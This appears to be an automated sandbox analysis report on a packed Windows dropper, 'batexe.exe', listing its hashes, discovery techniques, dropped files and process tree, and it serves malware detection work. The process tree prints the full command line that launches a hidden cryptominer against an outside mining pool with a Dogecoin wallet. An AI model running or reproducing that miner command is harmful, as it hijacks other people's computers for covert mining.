73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24-02-2024 04:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
924	b2e.exe
1612	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1612	cpuminer-sse2.exe
1612	cpuminer-sse2.exe
1612	cpuminer-sse2.exe
1612	cpuminer-sse2.exe
1612	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5248-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5248 wrote to memory of 924	5248	batexe.exe	86
PID 5248 wrote to memory of 924	5248	batexe.exe	86
PID 5248 wrote to memory of 924	5248	batexe.exe	86
PID 924 wrote to memory of 4144	924	b2e.exe	88
PID 924 wrote to memory of 4144	924	b2e.exe	88
PID 924 wrote to memory of 4144	924	b2e.exe	88
PID 4144 wrote to memory of 1612	4144	cmd.exe	92
PID 4144 wrote to memory of 1612	4144	cmd.exe	92

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5248
- C:\Users\Admin\AppData\Local\Temp\9CDC.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9CDC.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9CDC.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A3D1.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4144
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9CDC.tmp\b2e.exe

Filesize
11.6MB

MD5
20eff9e81aecf5c16fc2660ed04e62b7

SHA1
7653ec3b16cdd5dc50bc244e3684e4a19866cde1

SHA256
8f8feabd988584105f53238b8917f22d5b4c2ab824f4dea7fab2119970440c6f

SHA512
eedd7976ce00adfec28dcd189cd729ef258ab3a8cd2bda2dba666d8dc833a025b5cabfd377ef2b6da1cf9532eeaf517557a465babf425e8f0148a5b844bbadd7

Download Submit
C:\Users\Admin\AppData\Local\Temp\9CDC.tmp\b2e.exe

Filesize
2.3MB

MD5
fcf9b0a95dfd703e5cf551a74e0f7495

SHA1
57deaa9039e79d301f5251b769b644266e6624c1

SHA256
eb82b972003008dd9f95da8d563c35f79819ba5ce7567f8add9f6bc944d4a476

SHA512
b2f5a041fb7ada7816f4801fb8de7783288b3254563c40b71b337066a1492a4360a131106b1489f4fd9a2739ca0595f4a53c8044c5279ef212630cfd6bebe250

Download Submit
C:\Users\Admin\AppData\Local\Temp\9CDC.tmp\b2e.exe

Filesize
2.6MB

MD5
f845d6b8c0beb43591f7ebc96344f81b

SHA1
5bcb9d96f6589b559060e11d6d5a0bf73d91c80e

SHA256
841b8431f27f5e631d37c605530e6ce5430559c96fa9a6ddebc7e9dd63ad04b2

SHA512
8de293211ad14117c9ecb797c78c738c91b691f3dc861401d537cc72c9ba05a40340c452938bd6d72bf400efa1fffb7bb387f204035697b8a229a29288d5d357

Download Submit
C:\Users\Admin\AppData\Local\Temp\A3D1.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
896KB

MD5
9f9a8fea08bacf3a1d155567fead5940

SHA1
9d9ba8746c585446f53f442b800e1eb28a0df86a

SHA256
a22f9d8fb953e4f6bc93cdcc8aa650a5a093f1dd400fdc501d5aa7b00bee0289

SHA512
d41a048619373832c616d48f919595ac50dfbbd68095aec008b30adde91ceeeb86326c7d412ab20d937bab7096fb8165d3da8b4fdc40a03cc32da9ee3e9dc2a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
768KB

MD5
7511ee8c66d17030a4f24226caa425c7

SHA1
aa5bb6b2306f01ac82133f54ec36ca2491fb1911

SHA256
e9ad1acfa96a3be152713809498617dacb74878ed3ac3ed4e5b1455cf1fa5ac5

SHA512
4838197b397552aa7c22ca54d27ec420df0629689e111c40068480f5e37879bfbc89c84245ae8b0a6b4a16ee7d75197403153151eccbbe468b252f508e8466ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
768KB

MD5
fe316f2b417e142dffa0e03efb65e1a4

SHA1
907805b2c3bc0a0791086cb5fc8e3a950bc78e6d

SHA256
aca06866767d9e0bbe1e9bef7efce1152d34243e1acefc5f7ac4f6a245456671

SHA512
8ebfa0700b00c4064d1ded11fc1b4001f01238ee0c4cf88a873e0ccf38c30a574d600649bfdef85f2e3aec5c279a43680f7a66604bc6f27bbda0219e3786774d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
618KB

MD5
9c398689be1396b93532250202fdfd17

SHA1
7455dd872a47ce019754fe0e6a947f876fa0bca4

SHA256
adf560ae5401306fc17861ad85e64642c0444ca43e3a930197b3896bf32e3225

SHA512
b08c4891485f1754b7ca85f30c8368099c7cb3f839a6434bc0ffac3314baacceb2c3278438757d8d148e2b1654b08fff45037d06b7710ed419e58f324b919a21

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
768KB

MD5
613807ad6d525aded318b643c33bc17e

SHA1
2c9a4180140838c69c20bc4047c3d2d777d3bee4

SHA256
896775bd33edafb0d219d1ae3e973e71aa29a4937d0252bd3a4cad074c004971

SHA512
d688b0f2570944898097dcc6acb56b3a4c901073f0ce22b5ea260b05a37fe2840d84b44e7aa74c7d73078b0e5a45c24994852f5c03f049982b6ddca6ead89539

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
576KB

MD5
13746f79a51eb8ce3107de99ffc6b56a

SHA1
64a00c99a805f8775f08cda4e4d06e1150195347

SHA256
2c04d5960f13e859d49c78a8858bdcb0c53914306eba52746105a76d98f5d205

SHA512
d0e69c6cf0078c858e8258a4038098e644d611b544b6588b2b1c9d2d2937ade0472edc96257545f5935514bfa18970f5762eb393def612c5a7027727397ca8d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
595KB

MD5
6ff2ab77381d7afb55f3c6d5d78fa9e4

SHA1
ab5dabba5d268e836cb894c3c3a4ffc2101a5a7a

SHA256
54c52931e92772d3e246750be34a6412ceff86fcbe5edd43bbfb8b33aeef2f7b

SHA512
110b23950701d7474c97b9325494a2f857c1d2a819940e3031a62864c1a8363c8001a231d0a592dcdfb6784c955f3b14b5b6fa3502917ff276e49804c1be9ca1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/924-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/924-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1612-46-0x0000000055A20000-0x0000000055AB8000-memory.dmp

Filesize
608KB

Download
memory/1612-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1612-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1612-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1612-47-0x0000000001110000-0x00000000029C5000-memory.dmp

Filesize
24.7MB

Download
memory/1612-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1612-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1612-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1612-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1612-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1612-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1612-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1612-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1612-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5248-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download